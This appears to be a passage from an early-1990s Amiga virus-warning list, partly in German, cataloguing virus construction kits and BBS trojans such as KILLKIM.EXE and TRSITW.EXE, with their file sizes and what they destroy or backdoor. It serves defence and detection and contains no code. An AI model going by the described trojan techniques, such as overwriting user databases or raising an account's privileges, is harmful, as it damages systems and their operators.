Bildschirm aus. An einem FangFile konnten keine Veraenderungen festge- stellt werden. Dies kann aber bei einem Mailboxprg. anders sein. Fuer normale Amiga User nach meiner Meinung keine Gefahr und Sysops wissen sich zu helfen oder ?? - uinfo Laenge:13048 wird von VT NICHT erkannt Sucht nach AEDoorPort (AmiExpress ???) und Userdaten. Also fuer NormalUser ohne MailBox keine Gefahr. 10.09.92 - Virusconstructionset Laenge gepackt (PP2): 10192 Bytes Sie werden aufgefordert, einen max 60 Zeichen langen Display- Alert-Text einzugeben. Den erzeugten BB koennen Sie dann auf Disk in DF0: abspeichern. Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen Sie bitte das File, bevor Sie es loeschen. - VirusConstructionSet 2 Laenge gepackt (PP3): 32360 Bytes entpackt : 47944 Bytes Sie werden aufgefordert, einen max 60 Zeichen langen Display- Alert-Text einzugeben. Weitehin koennen Sie den Virusnamen festlegen, der dann immer im BB sichtbar ist. Mit F1 oder F2 legen Sie fest, ob der BB codiert abgespeichert wird. Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen Sie bitte das File, bevor Sie es loeschen. - Virusmaker V1.0 Laenge gepackt (PP): 15641 Bytes entpackt : 84216 Bytes erzeugt nach Wahl: Byte Bandit, Byte Warrior, S.C.A., North- Star 1+2, System Z Dringende Empfehlung: Loeschen Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen Sie bitte das File, bevor Sie es loeschen. - X-Ripper V1.1 Laenge: 41360 Bytes (ungepackt) erlaubt mit inst 5 das Schreiben eines Lamer-BBs. Es wird aber eine NDos-Disk daraus, weil die DOS0-Kennung um 8 Bytes verschoben angelegt wird. Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen Sie bitte das File, bevor Sie es loeschen. Programme gegen BBS, die ich nicht besitze. Bitte zusenden. Danke / ---> Date And Time Uploaded -- Mon 01-Feb-93 2:34:10 PM <--- \ ----------------------------------------------------------------------------- WARNING ! DO NEVER RUN THE FILE "KILLKIM.EXE" ON YOUR BBS COMPUTER !!! IT LOOKS FOR THE USER.DATA,USER.KEYS, STARTUP-SEQUENCE & EXPRESS MAINFILE AND FILLS THEM WITH THE FOLLOWING TEXT: --------------CUT HERE------------------ STARTUP-SEQUENCE SUCCESSFUL DESTROYED!!! --------------CUT HERE------------------ --------------CUT HERE----------------- USER.KEYS SUCCESSFUL DESTROYED !!! --------------CUT HERE----------------- AND SO ON. THEN IT RUNS AN APPENDED LSD INTRO. TO THE LAMER WHO 'CODED'[IT WAS COMPILED AREXX] THAT STUFF:LOOKS PRETTY LAME IF THERE'S A REQUESTER ON SCREEN "PLEASE INSERT VOLUME BBS: IN ANY DRIVE"... I WOULD AT LEAST CHECK IF BBS: ACTUALLY EXISTS ! CYCLONE/DUAL CREW / ---> Date And Time Uploaded -- Sun 31-Jan-93 1:31:54 PM <--- \ ----------------------------------------------------------------------------- ------------------------------------------------------------------------- WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! ------------------------------------------------------------------------- THE FILES JISMTRO.EXE IS A TROJAN ! IT CREATES A FILE IN AREA 2 UPLOAD DIR WITH THE NAME TSL-BBS.EXE !!!! DO NOT RUN IT ! ------------------------------------------------------------------------- Maerz 93: WARNiNG! A File Named 'TRSITW.EXE' Was Spread Some Days Ago, Labeled As A New TRSI Intro - This Is A Damn FAKE! And Even Worse It Has A BackDoor In It Which Tries To Open The File 'DH0:BBS/USER.DATA' ! After That It Looks For A User Called 'EASY-E' And Sets (If Existing) His UserLevel To 255 ! Whoever This Little Creep May Be : Give Him A Kick If Ya' Know Him ! ------------------------------------------------------------------------ April 93: Es ist ein Gfa-Basic-Programm aufgetaucht, das angeblich verschiedene Link-Viren erzeugt. VCS Laenge PP-crunched: 30276 VCS.info Laenge: 459 VCS.data Laenge: 23632 VCS1.data Laenge: 12536 Nach IHRER muehevollen, aber leider vergeblichen Arbeit, wird auf der Disk in df0 ein File mit Namen Tasten-Text erzeugt. Hallo Virustown ! Es ist Sommerzeit und der 1.April Aber vielleicht ist ja doch ein Virus da ? SCHAU DOCH MAL IN DER UHR NACH ?!!? Hier ne Tastenkombination: linke Hand: alt,ctrl,q,4,v rechte Hand: Enter,8,Alt,Help,ü Nase: F6 Zunge: z Ich finde den "GAG" nicht so stark und denke die erste geloeschte Festplatte, laesst diesen Programmierer mit seiner SINNLOSEN Arbeit, anders denken. -------------------------------------------------------------------------- Heiner Amiga ist ein eingetragenes Warenzeichen von Gateway 2000